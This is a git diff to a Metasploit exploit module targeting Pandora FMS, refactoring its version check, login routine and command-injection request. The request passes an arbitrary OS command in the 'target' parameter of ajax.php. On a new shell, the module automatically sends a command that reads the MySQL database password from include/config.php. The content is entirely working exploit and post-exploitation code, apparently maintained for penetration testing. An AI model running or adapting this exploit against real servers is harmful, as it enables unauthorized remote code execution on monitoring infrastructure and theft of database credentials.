diff --git a/modules/exploits/linux/http/pandora_fms_events_exec.rb b/modules/exploits/linux/http/pandora_fms_events_exec.rb index 85fc4eb998..5479babe79 100644 --- a/modules/exploits/linux/http/pandora_fms_events_exec.rb +++ b/modules/exploits/linux/http/pandora_fms_events_exec.rb @@ -83,23 +83,23 @@ class MetasploitModule < Msf::Exploit::Remote html = res.get_html_document full_version = html.at('div[@id="ver_num"]').text - unless full_version && (!full_version.to_s.eql? '') + if full_version.blank? return CheckCode::Detected('Could not determine the Pandora FMS version.') end version = full_version[1..-1].gsub!('NG', '') - unless version && (!version.to_s.eql? '') + if version.blank? return CheckCode::Detected('Could not determine the Pandora FMS version.') end version = Gem::Version.new version unless version <= Gem::Version.new('7.0.744') - return CheckCode::Safe("Target is Pandora FMS with version #{full_version}.") + return CheckCode::Safe("Target is Pandora FMS version #{full_version}.") end - CheckCode::Appears("Target is Pandora FMS with version #{full_version}.") + CheckCode::Appears("Target is Pandora FMS version #{full_version}.") end def login(user, pass) @@ -125,15 +125,13 @@ class MetasploitModule < Msf::Exploit::Remote fail_with Failure::NoAccess, 'Authentication failed' end - redirect = res.headers['Location'] - - unless redirect && redirect.to_s != '' + if res.headers['Location'].to_s == '' fail_with Failure::NoAccess, 'Authentication failed' end res = send_request_cgi({ 'method' => 'GET', - 'uri' => redirect, + 'uri' => res.headers['Location'], 'cookie' => @cookie }) @@ -146,28 +144,30 @@ class MetasploitModule < Msf::Exploit::Remote def on_new_session(client) super - print_status('Trying to read the MySQL DB password via `cat include/config.php | grep dbpass`. The default privileged user is `root`.') - command = 'cat include/config.php | grep dbpass' - client.shell_write(command + "\n") + print_status('Trying to read the MySQL DB password from include/config.php. The default privileged user is `root`.') + client.shell_write("grep dbpass include/config.php\n") end def execute_command(cmd, _opts = {}) print_status('Executing payload...') - referer_url = normalize_uri(target_uri.path, 'index.php', '?sec=eventos&sec2=operation/events/events') - data = 'page=include/ajax/events&perform_event_response=10000000' - data << "&target=#{cmd}" - data << '&response_id=1' + referer_url = normalize_uri(target_uri.path, 'index.php') - # using a raw request to prevent the post data from being encoded, which would prevent exploitation - send_request_raw({ + send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'ajax.php'), 'cookie' => @cookie, - 'headers' => { - 'Referer' => "http://#{datastore['RHOSTS']}#{referer_url}", - 'Content-Type' => 'application/x-www-form-urlencoded; charset=UTF-8' + 'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8', + 'Referer' => "http://#{datastore['RHOSTS']}#{referer_url}", + 'vars_get' => { + 'sec' => 'eventos', + 'sec2' => 'operation/events/events' }, - 'data' => data + 'vars_post' => { + 'page' => 'include/ajax/events', + 'perform_event_response' => '10000000', + 'target' => cmd.to_s, + 'response_id' => '1' + } }, 0) # the server will not send a response, so the module shouldn't wait for one end @@ -180,6 +180,6 @@ class MetasploitModule < Msf::Exploit::Remote end login(datastore['USERNAME'], datastore['PASSWORD']) - execute_command payload.encoded.gsub(/&/, '%26') + execute_command payload.encoded end end